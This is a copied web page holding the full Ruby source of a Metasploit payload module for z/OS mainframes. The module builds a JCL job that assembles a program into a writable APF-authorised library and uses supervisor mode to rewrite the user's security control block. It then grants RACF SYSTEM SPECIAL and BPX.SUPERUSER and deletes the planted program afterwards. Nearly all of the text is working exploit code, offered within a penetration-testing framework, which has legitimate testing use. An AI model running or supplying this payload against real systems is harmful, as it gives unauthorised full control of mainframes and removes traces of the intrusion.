Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb
Views: 11780
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45##6# This is a JCL command payload for z/OS - mainframe.7# It will escalate privileges of an account on the system if the user8# can identify a writable APF authorised library "APFLIB"9#10# See https://www.ibm.com/support/knowledgecenter/zosbasics/com.ibm.zos.zsecurity/zsecc_060.htm11# for more information on APF Authorized Libraries12#13# Thank you to Ayoub & The Brummie for the assembler ideas.14#15# To-do (BeS 4/11/17)16# Add options for privileges that can be added.17# Auto scan for writable APF authorized library.18##192021module MetasploitModule22CachedSize = 315623include Msf::Payload::Single24include Msf::Payload::Mainframe2526def initialize(info = {})27super(merge_info(28info,29'Name' => 'JCL to Escalate Privileges',30'Description' => %q{(Elevate privileges for user. Adds31SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using32an unsecured/updateable APF authorized library (APFLIB) and updating33the user's ACEE using this program/library. Note: This privesc only34works with z/OS systems using RACF, no other ESM is supported.)},35'Author' =>36[37'Bigendian Smalls',38'Ayoub'39],40'License' => MSF_LICENSE,41'Platform' => 'mainframe',42'Arch' => ARCH_CMD,43'Handler' => Msf::Handler::None,44'Session' => Msf::Sessions::MainframeShell,45'PayloadType' => 'cmd',46'RequiredCmd' => 'jcl',47'Payload' =>48{49'Offsets' => {},50'Payload' => ''51}52))53register_options(54[55Opt::RPORT(21),56OptString.new('ACTNUM', [true, "Accounting info for JCL JOB card", "MSFUSER-ACCTING-INFO"]),57OptString.new('PGMNAME', [true, "Programmer name for JCL JOB card", "programmer name"]),58OptString.new('JCLASS', [true, "Job Class for JCL JOB card", "A"]),59OptString.new('NOTIFY', [false, "Notify User for JCL JOB card", ""]),60OptString.new('MSGCLASS', [true, "Message Class for JCL JOB card", "Z"]),61OptString.new('MSGLEVEL', [true, "Message Level for JCL JOB card", "(0,0)"]),62OptString.new('APFLIB', [true, "APF Authorized Library to use", "SYS1.LINKLIB"])63],64self.class65)66register_advanced_options(67[68OptBool.new('NTFYUSR', [true, "Include NOTIFY Parm?", false]),69OptString.new('JOBNAME', [true, "Job name for JCL JOB card", "DUMMY"])70],71self.class72)73end7475##76# Construct Payload77##78def generate(_opts = {})79super + command_string80end8182##83# Setup replacement vars from options if need be84##85def command_string86jcl_jobcard +87"//S1 EXEC ASMACLG,PARM.L='AC(1)'\n" \88"//C.SYSLIB DD DSN=SYS1.SISTMAC1,DISP=SHR\n" \89"// DD DSN=SYS1.MACLIB,DISP=SHR\n" \90"//L.SYSLMOD DD DISP=SHR,DSN=#{datastore['APFLIB']}(APFPRIV)\n" \91"//C.SYSIN DD *,DLM=ZZ\n" \92" TITLE 'APF MISCONFIG PRIVESC FOR MSF'\n" \93"APFPRIV CSECT\n" \94"***********************************************************************\n" \95"* SETUP registers and save areas *\n" \96"***********************************************************************\n" \97"MAIN STM 14,12,12(13) # Save caller reg\n" \98" LR 8,15 # Base register\n" \99" USING MAIN,8 # R8 for addressability\n" \100" GETMAIN RU,LV=72 # for our savearea\n" \101" ST 13,4(,1) # Store Caller's SA address\n" \102" ST 1,8(,13) # Put my SA addr in caller's SA\n" \103" LR 13,1 # R13 has addr of our SA\n" \104" DS 0H # halfword boundaries\n" \105"***********************************************************************\n" \106"* MAIN PROGRAM STMTS HERE *\n" \107"***********************************************************************\n" \108" BAL 6,AUTHUSR # branch authuser routine\n" \109" B EXITP # exit time\n" \110"***********************************************************************\n" \111"* AUTHUSER ROUTINE *\n" \112"***********************************************************************\n" \113"AUTHUSR MODESET KEY=ZERO,MODE=SUP # let's get into supervisor mode!\n" \114" L 11,X'224' # R11 points to ASCB\n" \115" L 11,X'6C'(11) # R11 points to ASXB\n" \116" L 11,X'C8'(11) # R11 points to ACEE\n" \117" NI X'26'(11),X'00' # Clear Byte x'26'\n" \118" OI X'26'(11),X'B1' # Add Oper & Special to userproc\n" \119" NI X'27'(11),X'00' # Clear Byte x'27\n" \120" OI X'27'(11),X'80' # ALTER access to all resource\n" \121" MODESET KEY=NZERO,MODE=PROB # back to normal\n" \122" XR 15,15 # set rc=0 regardless\n" \123" BR 6 # R6 has return reg\n" \124"***********************************************************************\n" \125"* Cleanup and exit - R15 has exit code *\n" \126"***********************************************************************\n" \127"EXITP LR 1,13 # Move my SA into R1\n" \128" LR 2,15 # SAVE RC\n" \129" L 13,4(,13) # RST Caller SA Addr\n" \130" L 14,12(13) # Reload R14\n" \131" FREEMAIN RU,A=(1),LV=72\n" \132" LR 15,2 # RESTORE RC\n" \133" LM 0,12,20(13) # Reload all but 14/15\n" \134" BCR 15,14 # Branch back to caller\n" \135" END APFPRIV # end pgm\n" \136"ZZ\n" \137"//S2 EXEC PGM=IKJEFT01\n" \138"//SYSTSIN DD *\n" \139" ALU #{datastore['FTPUSER']} SPECIAL\n" \140" PE BPX.SUPERUSER CLASS(FACILITY) ID(#{datastore['FTPUSER']}) ACCESS(READ)\n" \141" SETR RACL(FACILITY) REF\n" \142"/*\n" \143"//SYSIN DD DUMMY\n" \144"//SYSTSPRT DD SYSOUT=*\n" \145"//S3 EXEC PGM=IDCAMS\n" \146"//SYSPRINT DD SYSOUT=*\n" \147"//TEMPDD DD DSN=#{datastore['APFLIB']},DISP=SHR\n" \148"//SYSIN DD *\n" \149" DELETE #{datastore['APFLIB']}(APFPRIV) FILE(TEMPDD)\n" \150"/*\n" \151end152end153154155